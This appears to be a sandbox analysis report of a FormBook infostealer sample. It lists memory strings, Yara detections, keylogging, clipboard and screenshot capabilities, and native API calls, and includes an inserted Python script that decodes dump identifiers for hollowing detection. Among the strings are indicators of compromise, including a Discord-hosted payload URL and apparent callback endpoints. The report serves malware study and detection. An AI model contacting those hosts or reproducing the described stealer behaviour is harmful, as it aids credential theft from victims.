Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/fashion_trends.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN2DV6
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/px.js?ch=1
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/px.js?ch=2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp String found in binary or memory: http://www.rodgroup.net/sk-logabpstatus.php?a=azNKanZNU0UxaU9PS2oreG5lOFBSSDFoK05hNy95bzJITFdxcjJUSm
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/?
Source: Accfdrv.exe, 00000005.00000003.272515659.0000000000851000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/K
Source: Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/R
Source: Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/777569443156197399/782882049986920478/Accfcxz
Source: AT113020.exe, 00000001.00000003.237560785.00000000007CF000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/777569443156197399/782882049986920478/Accfcxz&
Source: Accfdrv.exe, 00000005.00000003.272515659.0000000000851000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/c
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp String found in binary or memory: https://cdn.discordapp.com/o
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1R
Source: AT113020.exe, Accfdrv.exe, Accfdrv.exe, 0000000C.00000002.290227188.0000000004240000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/
Source: AT113020.exe, 00000001.00000002.242538042.00000000040E0000.00000004.00000001.sdmp, Accfdrv.exe, 00000005.00000002.276299189.0000000004073000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.290227188.0000000004240000.00000004.00000001.sdmp String found in binary or memory: https://discord.com/S
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wrep
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
Source: Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/R?
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/i?
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0SL
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00440590 OpenClipboard,GlobalAlloc,GlobalLock,EmptyClipboard,SetClipboardData,GlobalUnlock, 1_2_00440590
Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0042D090 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 1_2_0042D090
Contains functionality to record screenshots
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_0042D788 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 5_2_0042D788
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004506F4 GetKeyboardState, 1_2_004506F4
Yara detected Keylogger Generic
Source: Yara match File source: Process Memory Space: AT113020.exe PID: 5920, type: MEMORY
Source: Yara match File source: Process Memory Space: Accfdrv.exe PID: 5488, type: MEMORY
Source: Yara match File source: Process Memory Space: Accfdrv.exe PID: 5916, type: MEMORY

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
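The memory-dump identifiers in the Yara match lines above encode the process index, the region base address and the page protection of each dump, which is what lets an analyst see at a glance that the FormBook payload was found at 0x400000 with execute/write protection inside three ieinstal.exe instances (process 2, 6 and 16) rather than only in the original dropper. The following script is an added example, not part of the sandbox report: it decodes those identifiers and groups them by process. The field layout assumed for `<proc>.<seq>.<id>.<base>.<protection>.<type>.sdmp` and `<proc>.<seq>.<image>.<base>.<n>[.raw].unpack` is inferred from the identifiers as they appear on this page, not taken from a documented format, and the input is a constructed subset of the report's own match lines.

```python
"""Decode sandbox memory-dump / unpacked-PE identifiers from Yara match lines.

Added example, not part of the sandbox report. The identifier field layout
assumed here is inferred from the report's own lines (an assumption).
"""
import re
from collections import defaultdict

# Constructed input: a subset of the Yara match lines from the report.
SAMPLE_LINES = """\
Source: Yara match File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
"""

# Windows PAGE_* memory protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# Assumed layouts: <proc>.<seq>.<id>.<base>.<prot>.<type>.sdmp (all hex except <id>)
# and <proc>.<seq>.<image>.<base>.<n>[.raw].unpack (proc/seq/n decimal, base hex).
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.(?P<id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp")
UNPACK_RE = re.compile(
    r"(?P<proc>\d+)\.(?P<seq>\d+)\.(?P<image>[^.]+\.exe)\.(?P<base>[0-9A-Fa-f]+)"
    r"\.(?P<n>\d+)\.(?P<raw>raw\.)?unpack")


def parse_match(line):
    """Return a dict for one Yara match line, or None if the line is not one."""
    m = SDMP_RE.search(line)
    if m:
        return {"kind": "MEMORY", "proc": int(m["proc"], 16),
                "base": int(m["base"], 16), "prot": int(m["prot"], 16), "image": None}
    m = UNPACK_RE.search(line)
    if m:
        return {"kind": "UNPACKEDPE", "proc": int(m["proc"]),
                "base": int(m["base"], 16), "prot": None, "image": m["image"]}
    return None


def summarize(text):
    """Group matching memory regions by process index; the image name is learned
    from the UNPACKEDPE lines of the same process (the .sdmp names carry none)."""
    matches = [p for p in (parse_match(l) for l in text.splitlines()) if p]
    images = {p["proc"]: p["image"] for p in matches if p["image"]}
    regions = defaultdict(set)
    for p in matches:
        if p["kind"] == "MEMORY":
            regions[p["proc"]].add((p["base"], p["prot"]))
    return {proc: {"image": images.get(proc), "regions": sorted(regs)}
            for proc, regs in regions.items()}


def hollowing_candidates(summary):
    """Processes whose matching region sits at 0x400000 with PAGE_EXECUTE_READWRITE.
    A normally mapped image section is not writable+executable, so an RWX region at
    the image base is consistent with the original image having been replaced, which
    is what the report's 'process hollowing' signature asserts for ieinstal.exe."""
    return sorted((proc, info["image"]) for proc, info in summary.items()
                  for base, prot in info["regions"] if base == 0x400000 and prot == 0x40)


def render(summary):
    """One human-readable line per matching memory region."""
    out = []
    for proc in sorted(summary):
        image = summary[proc]["image"] or "?"
        for base, prot in summary[proc]["regions"]:
            out.append(f"proc {proc:>2} {image:<14} 0x{base:08X} "
                       f"{PAGE_PROTECTION.get(prot, hex(prot))}")
    return out


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    print("\n".join(render(s)))
    print("hollowing candidates:", hollowing_candidates(s))
```

Processes 8, 9 and 12 also appear in the full match list but have no UNPACKEDPE line in the constructed subset, so their image names would come back as `?`; the protection value is the page protection at dump time, not necessarily the protection the code was first written with.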

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417BA0 NtCreateFile, 2_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417C50 NtReadFile, 2_2_00417C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417CD0 NtClose, 2_2_00417CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417D80 NtAllocateVirtualMemory, 2_2_00417D80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417BF2 NtReadFile, 2_2_00417BF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417B9A NtCreateFile, 2_2_00417B9A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417CCA NtClose, 2_2_00417CCA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417D7A NtAllocateVirtualMemory, 2_2_00417D7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479A50 NtCreateFile,LdrInitializeThunk, 2_2_03479A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_03479A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479A20 NtResumeThread,LdrInitializeThunk, 2_2_03479A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_03479910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034799A0 NtCreateSection,LdrInitializeThunk, 2_2_034799A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479840 NtDelayExecution,LdrInitializeThunk, 2_2_03479840
